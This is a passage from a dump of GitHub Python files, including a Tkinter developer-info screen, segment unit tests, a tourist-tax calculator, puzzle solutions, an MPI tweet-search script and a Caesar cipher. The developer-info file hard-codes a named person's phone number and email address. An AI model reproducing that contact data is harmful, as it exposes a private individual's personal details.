height=150)\n\n developer_info = LabelFrame(\n Left_frame, bd=0, relief=RIDGE, text=\"\", font=(\n \"'Fredoka One', sans-serif\", 11, \"bold\"), fg=\"blue\")\n developer_info.place(x=200, y=190, width=545, height=350)\n\n # for name\n\n dev_name = Label(developer_info, text=\"Name\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_name.grid(row=0, column=0, padx=10, pady=10, sticky=W)\n\n dev_name1 = Label(developer_info, text=\": Akhilesh Yadav\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_name1.grid(row=0, column=1, padx=10, pady=10, sticky=W)\n\n # for graduation\n\n dev_graduatin = Label(developer_info, text=\"Graduation\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_graduatin.grid(row=1, column=0, padx=10, pady=10, sticky=W)\n\n dev_graduatin1 = Label(developer_info, text=\": Bachelor Of Technology\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_graduatin1.grid(row=1, column=1, padx=10, pady=10, sticky=W)\n\n # Stream\n dev_stream = Label(developer_info, text=\"Stream\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_stream.grid(row=2, column=0, padx=10, pady=10, sticky=W)\n\n dev_stream1 = Label(developer_info, text=\": Computer Science and Engineering\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_stream1.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\n # Office\n dev_office = Label(developer_info, text=\"Office\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_office.grid(row=3, column=0, padx=10, pady=10, sticky=W)\n\n dev_office = Label(developer_info, text=\": Kanpur,Utter Pradesh\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_office.grid(row=3, column=1, padx=10, pady=10, sticky=W)\n\n # Phone\n\n dev_phone = Label(developer_info, text=\"Phone\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_phone.grid(row=4, column=0, padx=10, pady=10, sticky=W)\n\n dev_phone1 = Label(developer_info, text=\": +919616588637\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_phone1.grid(row=4, column=1, padx=10, pady=10, sticky=W)\n\n # email\n\n dev_email = Label(developer_info, text=\"Email\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_email.grid(row=5, column=0, padx=10, pady=10, sticky=W)\n\n dev_email1 = Label(developer_info, text=\": yadavakhilesh201616@gmail.com\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_email1.grid(row=5, column=1, padx=10, pady=10, sticky=W)\n\n # Right frame\n Right_frame = LabelFrame(\n main_frame, bd=2, relief=RIDGE, text=\"Python Library and other Funcion Used in this Project\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"blue\")\n Right_frame.place(x=760, y=0, width=760, height=595)\n\n developer_skills = LabelFrame(\n Right_frame, bd=2, relief=RIDGE, text=\"\", font=(\n \"'Fredoka One', sans-serif\", 11, \"bold\"), fg=\"blue\")\n developer_skills.place(x=0, y=0, width=750, height=570)\n\n\n# Files used in thhis project\n\n dev_files = Label(developer_skills, text=\"Files\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_files.grid(row=0, column=0, padx=10, pady=10, sticky=W)\n\n dev_files1 = Label(developer_skills, text=\": main.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files1.grid(row=0, column=1, padx=10, pady=10, sticky=W)\n\n 
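developer.py resizes every image with `Image.ANTIALIAS`, which Pillow removed in version 10; a minimal sketch of the same resize with the current filter name (the path is taken from the record, Pillow >= 9.1 assumed):

```python
from PIL import Image

# Image.ANTIALIAS is gone in Pillow 10; LANCZOS is the same filter
# (also spelled Image.Resampling.LANCZOS since Pillow 9.1).
img = Image.open("images/mh1.jpg")
img = img.resize((510, 130), Image.LANCZOS)
```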
dev_files2 = Label(developer_skills, text=\", student.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files2.grid(row=0, column=2, padx=10, pady=10, sticky=W)\n\n dev_files3 = Label(developer_skills, text=\", train.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files3.grid(row=0, column=3, padx=10, pady=10, sticky=W)\n\n dev_files4 = Label(developer_skills, text=\", developer.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files4.grid(row=0, column=4, padx=10, pady=10, sticky=W)\n dev_files5 = Label(developer_skills, text=\", attendence.py\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_files5.grid(row=0, column=5, padx=10, pady=10, sticky=W)\n\n# Technical skills\n\n dev_tech = Label(developer_skills, text=\"Technical Skills\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_tech.grid(row=1, column=0, padx=10, pady=10, sticky=W)\n # skills\n dev_tech1 = Label(developer_skills, text=\": Python\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_tech1.grid(row=1, column=1, padx=10, pady=10, sticky=W)\n\n dev_tech2 = Label(developer_skills, text=\", MySQL\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_tech2.grid(row=1, column=2, padx=10, pady=10, sticky=W)\n\n# Library used in this project are\n\n dev_lib = Label(developer_skills, text=\"Library Used\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"red\")\n dev_lib.grid(row=2, column=0, padx=10, pady=10, sticky=W)\n\n dev_lib1 = Label(developer_skills, text=\": NumPy, cv2 ,\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib1.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\n dev_lib2 = Label(developer_skills, text=\",Tkinter, os ,\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib2.grid(row=2, column=2, padx=10, pady=10, sticky=W)\n\n dev_lib4 = Label(developer_skills, text=\"PIL , \", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib4.grid(row=2, column=3, padx=10, pady=10, sticky=W)\n\n dev_lib5 = Label(developer_skills, text=\"mysql.connector , \", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib5.grid(row=2, column=4, padx=10, pady=10, sticky=W)\n\n dev_lib6 = Label(developer_skills, text=\"csv\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib6.grid(row=2, column=5, padx=10, pady=10, sticky=W)\n\n\nif __name__ == \"__main__\":\n root = Tk()\n obj = Developer(root)\n root.mainloop()\n","repo_name":"Erakhileshkiot2000/CAMS-by-Face-recognition","sub_path":"developer.py","file_name":"developer.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72715274019","text":"import unittest\n\nimport numpy as np\n\nimport daps.utils.segment as segment\n\n\nclass test_segment_utilities(unittest.TestCase):\n def test_format(self):\n # Test d2b\n boxes = np.array([[10, 3], [5, 7]])\n bsol = np.array([[10, 12], [5, 11]])\n bout = segment.format(boxes, 'd2b')\n np.testing.assert_array_equal(bout, bsol)\n # Test b2c\n boxes = bout.copy()\n bsol = np.array([[11, 3], [8, 7]])\n bout = segment.format(boxes, 'b2c')\n np.testing.assert_array_equal(bout, bsol)\n # Test c2b\n boxes = bout.copy()\n bsol = np.array([[10, 12], [5, 11]])\n bout = segment.format(boxes, 'c2b')\n 
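The `test_format` expectations above pin down an inclusive frame convention: `d2b` maps `[start, duration]` to `[begin, end]` with `end = begin + duration - 1`, `b2c` maps boundaries to `[center, duration]`, and `c2b` inverts it. A standalone sketch of those conversions, inferred from the expected arrays rather than from the daps source:

```python
import numpy as np

def d2b(x):  # [start, duration] -> [begin, end], inclusive frames
    return np.stack([x[:, 0], x[:, 0] + x[:, 1] - 1], axis=1)

def b2c(x):  # [begin, end] -> [center, duration]
    return np.stack([(x[:, 0] + x[:, 1]) // 2, x[:, 1] - x[:, 0] + 1], axis=1)

def c2b(x):  # [center, duration] -> [begin, end]
    half = (x[:, 1] - 1) // 2
    return np.stack([x[:, 0] - half, x[:, 0] + half], axis=1)

boxes = np.array([[10, 3], [5, 7]])
assert (d2b(boxes) == np.array([[10, 12], [5, 11]])).all()
assert (b2c(d2b(boxes)) == np.array([[11, 3], [8, 7]])).all()
assert (c2b(b2c(d2b(boxes))) == d2b(boxes)).all()
```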
np.testing.assert_array_equal(bout, bsol)\n\n def test_intersection(self):\n a = np.random.rand(1)\n b = np.array([[1, 10], [5, 20], [16, 25]])\n self.assertRaises(ValueError, segment.intersection, a, b)\n a = np.random.rand(100, 2)\n self.assertEqual((100, 3, 2), segment.intersection(a, b).shape)\n a = np.array([[5, 15]])\n gt_isegs = np.array([[[5, 10], [5, 15], [16, 15]]], dtype=float)\n np.testing.assert_array_equal(gt_isegs, segment.intersection(a, b))\n results = segment.intersection(a, b, True)\n self.assertEqual(2, len(results))\n self.assertEqual((a.shape[0], b.shape[0]), results[1].shape)\n\n def test_iou(self):\n a = np.array([[1, 10], [5, 20], [16, 25]])\n b = np.random.rand(1)\n self.assertRaises(ValueError, segment.iou, a, b)\n b = np.random.rand(100, 2)\n self.assertEqual((3, 100), segment.iou(a, b).shape)\n b = np.array([[1, 10], [1, 30], [10, 20], [20, 30]])\n rst = segment.iou(a, b)\n # segment is equal\n self.assertEqual(1.0, rst[0, 0])\n # segment is disjoined\n self.assertEqual(0.0, rst[0, 3])\n # segment is contained\n self.assertEqual(10.0/30, rst[2, 1])\n # segment to left\n self.assertEqual(5.0/16, rst[2, 2])\n # segment to right\n self.assertEqual(6/15.0, rst[2, 3])\n\n def test_nms_detection(self):\n boxes = np.array([[10, 13],\n [7, 11],\n [5, 7],\n [11, 12],\n [9, 15]])\n scores = np.arange(boxes.shape[0])[::-1]\n # No score, NMS by iou\n idx_sol = [4, 3, 1, 2]\n bout, sout = segment.non_maxima_supression(boxes, None, 0.5)\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # No score, NMS by overlap\n idx_sol = [4, 1, 2]\n bout, sout = segment.non_maxima_supression(boxes, None,\n measure='overlap')\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # With score, NMS by iou\n idx_sol = [0, 1, 2, 3]\n bout, sout = segment.non_maxima_supression(boxes, scores, 0.5)\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # With score, NMS by overlap\n idx_sol = [0, 1, 2, 4]\n bout, sout = segment.non_maxima_supression(boxes, scores,\n measure='overlap')\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n","repo_name":"escorciav/daps","sub_path":"daps/utils/test/test_segment.py","file_name":"test_segment.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"34"} +{"seq_id":"9566003902","text":"import tkinter as tk\n\n\n#FUNCTIONS\n#calculation function\ndef calc_tax(stay_price, stay_length, minor_count, adult_count):\n\n\t#defining daily prices\n\tdaily_price = stay_price/stay_length\n\tdaily_price_per_capita = daily_price/(minor_count+adult_count)\n\n\t#making sure per capita price doesn't exceed 2.53 euros\n\tper_adult_tax = (0.03*daily_price_per_capita)*(1.1)\n\tif per_adult_tax>2.53:\n\t\tper_adult_tax = 2.53\n\n\tper_adult_tax = round(per_adult_tax, 2)\n\ttotal_tax = adult_count*per_adult_tax\n\treturn per_adult_tax, total_tax*stay_length\n\ndef give_result():\n\t#fetching user input\n\tstay_price = stay_price_var.get()\n\tstay_length = stay_length_var.get()\n\tminor_count = minor_count_var.get()\n\tadult_count = adult_count_var.get()\n\tprint(stay_price, stay_length, minor_count, adult_count)\n\t#making sure values are legal\n\tcan_calc=True\n\tif stay_price == 0:\n\t\tstay_price_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: stay_price_label[\"fg\"] = \"black\"\n\n\tif stay_length ==0:\n\t\tstay_length_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: stay_length_label[\"fg\"] = \"black\"\n\n\tif adult_count 
==0:\n\t\tadult_count_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: adult_count_label[\"fg\"] = \"black\"\n\n\tif can_calc==False:return\n\n\tglobal total_tax_var\n\tglobal per_adult_tax_var\n\tprint(total_tax_var.get(), per_adult_tax_var.get())\n\ttax1, tax2 = calc_tax(stay_price, stay_length, minor_count, adult_count)\n\tper_adult_tax_var.set(\"{}€\".format(tax1))\n\ttotal_tax_var.set(\"{}€\".format(tax2))\n\tprint(total_tax_var.get(), per_adult_tax_var.get())\n\n\n\n#DEFINING GLOBAL VARIABLES\nTITLE = \"Outil de calcul pour la taxe de séjour.\"\n\n#SETTING UP THE WINDOW\nmain_window = tk.Tk()\nmain_window.title(TITLE)\nmain_window.grid_rowconfigure(0, weight=1)\nmain_window.grid_columnconfigure(0, weight=1)\n\n#DEFINING WIDGETS\n#title_label = tk.Label(main_window, text=TITLE)\n#defining stay vars\nstay_length_var= tk.IntVar()\nadult_count_var= tk.IntVar()\nminor_count_var = tk.IntVar()\nstay_price_var = tk.DoubleVar()\nper_adult_tax_var = tk.StringVar()\ntotal_tax_var = tk.StringVar()\n#making labels\nstay_length_label = tk.Label(main_window, text=\"Durée du séjour\")\nadult_count_label = tk.Label(main_window, text=\"Nombre d'adultes\")\nminor_count_label = tk.Label(main_window, text=\"Nombre d'enfants\")\nstay_price_label = tk.Label(main_window, text=\"Prix du séjour\", fg=\"black\")\nper_adult_tax_name_label = tk.Label(main_window, text=\"Prix unitaire par jour\")\ntotal_tax_name_label = tk.Label(main_window, text=\"Prix total pour le séjour\")\nper_adult_tax_label = tk.Label(main_window, textvariable=per_adult_tax_var)\ntotal_tax_label = tk.Label(main_window, textvariable=total_tax_var)\n#making entries\nstay_length_entry = tk.Entry(main_window, textvariable=stay_length_var, width=5)\nadult_count_entry = tk.Entry(main_window, textvariable=adult_count_var, width=5)\nminor_count_entry = tk.Entry(main_window, textvariable=minor_count_var, width=5)\nstay_price_entry = tk.Entry(main_window, textvariable=stay_price_var, width=5)\n#making buttons\nvalidate_button = tk.Button(text=\"Calculer\", command=give_result)\nquit_button = tk.Button(text=\"Quitter\", command=main_window.quit)\n\n#CREATING WIDGETS\n#packing labels\n#title_label.grid(row=1, column=1)\nstay_length_label.grid(row=2, column=1, padx=30, pady=5)\nadult_count_label.grid(row=3, column=1, padx=30, pady=5)\nminor_count_label.grid(row=4, column=1, padx=30, pady=5)\nstay_price_label.grid(row=5, column=1, padx=30, pady=5)\nper_adult_tax_name_label.grid(row=6, column=1, padx=30, pady=5)\ntotal_tax_name_label.grid(row=6, column=2, padx=30, pady=5)\nper_adult_tax_label.grid(row=7, column=1, padx=30, pady=5)\ntotal_tax_label.grid(row=7, column=2, padx=30, pady=5)\n#packing entries\nstay_length_entry.grid(row=2, column=2, padx=30, pady=5)\nadult_count_entry.grid(row=3, column=2, padx=30, pady=5)\nminor_count_entry.grid(row=4, column=2, padx=30, pady=5)\nstay_price_entry.grid(row=5, column=2, padx=30, pady=5)\n#packing buttons\nvalidate_button.grid(row=8, column=1)\nquit_button.grid(row=8, column=2)\n\n#RUNNING THE APP\nmain_window.mainloop()","repo_name":"s0lst1ce/calculateur-taxe-sejour","sub_path":"tax_UI.py","file_name":"tax_UI.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"22151938284","text":"# 76. 
Minimum Window Substring\n# Given a string s and a string t, return the minimum substring of s that covers all the characters of t. If s contains no substring covering all the characters of t, return the empty string \"\".\n\n# Note: if such a substring exists in s, it is guaranteed to be the unique answer.\n\n# Source: LeetCode (力扣)\n# Link: https://leetcode-cn.com/problems/minimum-window-substring\n# The copyright belongs to LeetCode. Contact them for authorization before commercial reuse, and credit the source for non-commercial reuse.\nimport collections\nclass Solution:\n    def minWindow(self, s: str, t: str) -> str:\n        targetDict=collections.defaultdict(int)\n        for tt in t:\n            targetDict[tt]+=1\n        numDict = collections.defaultdict(int)\n        fbe,fen,minDis = 0,0,float(\"inf\")\n        begin,end=0,0\n        def issuperset():\n            for k in targetDict:\n                if numDict[k] None:\n        self.api = API()\n\n    def test_get_phonenumbers(self):\n        responses = self.api.get_phone_numbers(account_id=os.getenv('FACEBOOK_CLOUD_TEST_ACCOUNT_ID'))\n\n        for response in responses:\n            print(response.json())\n            self.assertIs(response.status_code, 200)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"KoterIA/FacebookCloudAPI","sub_path":"tests/v13/phone_numbers.py","file_name":"phone_numbers.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23526412486","text":"\"\"\"11729 Tower of Hanoi move sequence\"\"\"\n#\n#\n# def count(start, end):\n#     global list_1\n#     list_1.append(f\"{start} {end}\")\n#\n#\n# def hanoi(num, start=1, end=3):\n#     if num == 0:\n#         return\n#\n#     # the peg that is neither the start nor the destination\n#     other = 6 - end - start\n#\n#     hanoi(num - 1, start, other)\n#     count(start, end)\n#     hanoi(num - 1, other, end)\n#\n#\n# # list for storing the moves\n# list_1 = []\n#\n# # read the number of disks\n# num = int(input())\n#\n# hanoi(num)\n#\n# # print the number of moves\n# print(len(list_1))\n#\n# # print the moves\n# for i in list_1:\n#     print(i)\n#\n# # ----------------------------------------------------------------------\n# \"\"\"Another solution\"\"\"\n# n = int(input())\n#\n#\n# def hanoi_2(n, a, b, c):\n#     if n == 1:\n#         print(a, c)\n#     else:\n#         hanoi_2(n - 1, a, c, b)\n#         print(a, c)\n#         hanoi_2(n - 1, b, a, c)\n#\n#\n# sum = 1\n#\n# for i in range(n - 1):\n#     sum = sum * 2 + 1\n#\n# print(sum)\n# hanoi_2(n, 1, 2, 3)\n\n######################################################################################\n\"\"\"Solution from 2022-03-18\"\"\"\n\npath = []\n\n\ndef hanoi(num, start, mid, end):\n    if num == 0:\n        return\n\n    hanoi(num - 1, start, end, mid)\n    path.append([start, end])\n    hanoi(num - 1, mid, start, end)\n\n\nnum = int(input())\nhanoi(num, 1, 2, 3)\nprint(len(path))\nfor start, end in path:\n    print(start, end)\n","repo_name":"Kdelphinus/Python_study","sub_path":"Baekjoon/solve_step_by_step/21_recursion/7. 하노이 탑 이동 순서.py","file_name":"7. 
하노이 탑 이동 순서.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71451803297","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nwith open(\"outputs.txt\") as f:\n lineList = f.readlines()\n\nx = []\ny = []\n\nfor line in lineList:\n arr = line.split(' ')\n x.append(int(arr[0]))\n y.append(float(arr[1]))\n\nconstLog = x[-1]*np.log(x[-1])/y[-1]\n\nx1 = np.arange(x[0], x[-1], x[1]-x[0])\ny1 = x1*np.log(x1)/constLog\n\nconstS = x[-1]*x[-1]/y[-1]\n\ny2 = x1*x1/constS\n\nplt.plot(x, y, 'b')\nplt.plot(x1, y2, 'r')\nplt.savefig(\"outputs5000.png\")","repo_name":"egorlw26/UniversityLabs","sub_path":"4Course/Semester1/AlgorithmsBenchmark/BenchCXXForGrahamScan/Bench.py","file_name":"Bench.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31795773889","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ============================================================================ #\n# File: search_mpi.py #\n# Author: Haidong Wang #\n# Student ID: 678725 #\n# Input: This program can receive one string parameter in the console, this #\n# parameter will be used to count it's frequency it appears in files. #\n# Output: The search result will be print in the console, along with the wall #\n# time that the program costs. #\n# Description: This is the program that search a csv file in parallel system. #\n# It can 1. find the frequency of given word, 2. find the top 10 popular #\n# users, 3. find the top 10 popular topics. #\n# ============================================================================ #\n\n\n# import some module used in this program.\nimport re\nimport sys\nfrom mpi4py import MPI\nfrom datetime import datetime\nfrom collections import Counter\n\n# ---------------------------------------------------------------------------- #\n\n\n# This function will divede a twitter file into a list of lines, the size of\n# the list is appointed by the parameter: piece_size.\ndef divide_file(file, piece_size = 1024 * 1024 * 50):\n # Divide file by lines. 
Each piece is default size.\n while True:\n file_lines = file.readlines(piece_size)\n if not file_lines:\n break\n yield file_lines\n\n# ---------------------------------------------------------------------------- #\n\n\n# Record the beginning time.\nprogram_start_time = datetime.now().timestamp()\n\n# Set the query word, if users input words from console, then replace it.\nquery = 'melbourne'\nif len(sys.argv) >= 2 and sys.argv[1]:\n query = sys.argv[1]\n\n# Initialize MPI variables.\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n# Set the path of twitter file, then open it.\npath = 'oneGTwitter.csv'\n# Open the file.\nwith open(path, 'r', encoding='utf-8') as twitter_file:\n\n # Only generate counters in the root.\n if rank == 0:\n sum_query = Counter()\n sum_users = Counter()\n sum_topic = Counter()\n\n parallel_time = 0\n\n # Divide large file into blocks\n for twitter_list in divide_file(twitter_file):\n # Do different tasks in different rank.\n if rank == 0:\n # Create a now twitter_chunks which is a list of list.\n twitter_chunks = [[] for _ in range(size)]\n for i, chunk in enumerate(twitter_list):\n twitter_chunks[i % size].append(chunk)\n else:\n # Do nothing is the rank isn't the root\n twitter_list = None\n twitter_chunks = None\n # Each rank get their data from scatter.\n local_chunk = comm.scatter(twitter_chunks, root=0)\n\n # Start record the time that program start running in parallel\n parallel_start_time = datetime.now().timestamp()\n\n # Create 3 counters to record statistical data.\n query_per_chunk = Counter()\n users_per_chunk = Counter()\n topic_per_chunk = Counter()\n\n # Search each line of chunk, update counters.\n for item in local_chunk:\n # This regex will find all 'query word' in one twitter.\n queryPerItem = re.findall(query, item.lower())\n # This regex will find all 'user'(start with @) in one twitter.\n usersPerItem = re.findall(r'(?<=@)\\w+', item.lower())\n # This regex will find all 'topic'(start with #) in one twitter.\n topicPerItem = re.findall(r'(?<=#)\\w+', item.lower())\n # Store the results in counters.\n query_per_chunk.update(queryPerItem)\n users_per_chunk.update(usersPerItem)\n topic_per_chunk.update(topicPerItem)\n\n # Start record the end time that program running in parallel\n parallel_end_time = datetime.now().timestamp()\n\n parallel_time += (parallel_end_time - parallel_start_time)\n\n # Gathering data as a tuple.\n local_data = (query_per_chunk, users_per_chunk, topic_per_chunk)\n combine_data = comm.gather(local_data, root=0)\n\n # Add counters from each chunk together at the root.\n if rank == 0:\n # Add data to global varibables\n for data_tuple in combine_data:\n sum_query.update(data_tuple[0])\n sum_users.update(data_tuple[1])\n sum_topic.update(data_tuple[2])\n\n#### The file is now been closed.\n\n# Record the end time.\nprogram_end_time = datetime.now().timestamp()\n\n# ---------------------------------------------------------------------------- #\n\n\n# Printing the data and formatting.\nif rank == 0:\n # Printing the result.\n dotFormat = 0\n print('\\n================= Word Frequency ==================')\n for (query, times) in sum_query.most_common():\n print(' ' + query + ' ', end='')\n dotFormat = 41 - len(str(times)) - len(query)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n print('\\n================== Top10 Users ====================')\n for (names, times) in sum_users.most_common(10):\n print(' @' + names + ' ', end='')\n dotFormat = 40 - 
len(str(times)) - len(names)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n print('\\n================== Top10 Topics ===================')\n for (topic, times) in sum_topic.most_common(10):\n print(' #' + topic + ' ', end='')\n dotFormat = 40 - len(str(times)) - len(topic)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n # Calculating the time of wall.\n duration_time = str(\"%.2f\" % (program_end_time - program_start_time))\n # Calculating the time of program running in the parallel process.\n parallel_time = str(\"%.2f\" % (parallel_time))\n print('\\n[ Time of wall : %s s ]' % duration_time)\n print('\\n[ Time of parallel : %s s ]' % parallel_time)\n","repo_name":"wanghdnku/COMP90024-Cloud-Computing","sub_path":"Assignment1/search_mpi.py","file_name":"search_mpi.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21387749500","text":"rabbits = 3\n\nn = [1,2,34,2,3,1,6,6,7,5]\n\na = 'tweak the problem when you see the glimpse of it see'\nlst = a.split(' ')\n\n\ndef find_wor(s):\n find_word = dict()\n for word in s:\n find_word.setdefault(word, 0)\n find_word[word] += 1\n return find_word\n\nprint(find_wor(lst))\n\ndef funct(list):\n d= {}\n for i in list:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n return d\n\nprint(funct(n))\n\n\n\nwhile rabbits >0:\n print(rabbits)\n rabbits = rabbits - 1\n\nlist = [1,23,-1,5]\nresult = 0\n\nfor i in list:\n if i < 0:\n break\n result += i\nprint(result)","repo_name":"dariakrav/my_python","sub_path":"my_programming/xec.py","file_name":"xec.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15624292780","text":"import codecs\nimport os\nimport re\n\nimport setuptools.dist\n\n\ndef read(*directories):\n pathname = os.path.abspath(os.path.dirname(__file__))\n\n return codecs.open(os.path.join(pathname, *directories), \"r\").read()\n\n\ndef find_version(*pathnames):\n data = read(*pathnames)\n\n matched = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", data, re.M)\n\n if matched:\n return matched.group(1)\n\n raise RuntimeError(\"Unable to find version string.\")\n\n\n__version__ = find_version(\"prokaryote\", \"__init__.py\")\n\nsetuptools.setup(\n author=\"Allen Goodman\",\n author_email=\"allen.goodman@icloud.com\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Java\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Image Recognition\",\n \"Topic :: Scientific/Engineering\"\n ],\n license=\"BSD\",\n name=\"prokaryote\",\n package_data={\n \"prokaryote\": [\n \"prokaryote-{}.jar\".format(__version__)\n ]\n },\n packages=setuptools.find_packages(),\n python_requires=\">=2.7, <4\",\n url=\"https://github.com/CellProfiler/prokaryote\",\n version=__version__,\n zip_safe=False\n)\n","repo_name":"CellProfiler/prokaryote","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} 
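search_mpi.py above deals lines out to ranks round-robin, scatters the chunks, counts locally, and merges the per-rank `Counter`s after a gather; the same pattern in miniature (requires mpi4py; run with e.g. `mpiexec -n 4 python wordcount.py`):

```python
from collections import Counter
from mpi4py import MPI

comm = MPI.COMM_WORLD
rank, size = comm.Get_rank(), comm.Get_size()

if rank == 0:
    lines = ["a b a", "b c", "a c c", "b b a"]
    chunks = [lines[i::size] for i in range(size)]  # round-robin split
else:
    chunks = None

local_lines = comm.scatter(chunks, root=0)
local_counts = Counter(word for line in local_lines for word in line.split())

gathered = comm.gather(local_counts, root=0)
if rank == 0:
    total = Counter()
    for counts in gathered:
        total.update(counts)
    print(total)  # Counter({'a': 4, 'b': 4, 'c': 3})
```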
+{"seq_id":"73880943136","text":"import sys\n\ndef cifrar_cesar(texto, corrimiento):\n texto_cifrado = \"\"\n for caracter in texto:\n if caracter.isalpha():\n mayuscula = caracter.isupper()\n caracter = caracter.lower()\n codigo_ascii = ord(caracter)\n codigo_cifrado = ((codigo_ascii - ord('a') + corrimiento) % 26) + ord('a')\n if mayuscula:\n caracter_cifrado = chr(codigo_cifrado).upper()\n else:\n caracter_cifrado = chr(codigo_cifrado)\n else:\n caracter_cifrado = caracter\n texto_cifrado += caracter_cifrado\n return texto_cifrado\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Uso: python3 cesar.py \")\n sys.exit(1)\n\n texto_original = sys.argv[1]\n corrimiento = int(sys.argv[2])\n\n texto_cifrado = cifrar_cesar(texto_original, corrimiento)\n print(texto_cifrado)\n\n","repo_name":"nicowarrr/Lab1","sub_path":"cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24424485209","text":"\r\nfrom PySide6.QtWidgets import QApplication, QMainWindow\r\nfrom PySide6.QtGui import QIcon\r\nimport sys\r\n\r\n\r\n\r\n\r\nclass Window(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n\r\n self.setGeometry(100,100,500,500)\r\n self.setWindowTitle(\"Satislar\")\r\n self.setWindowIcon(QIcon('icons/qt.png'))\r\n self.setStyleSheet('background-color:blue')\r\n self.setWindowOpacity(0.7)\r\n\r\n\r\napp = QApplication([])\r\nwindow = 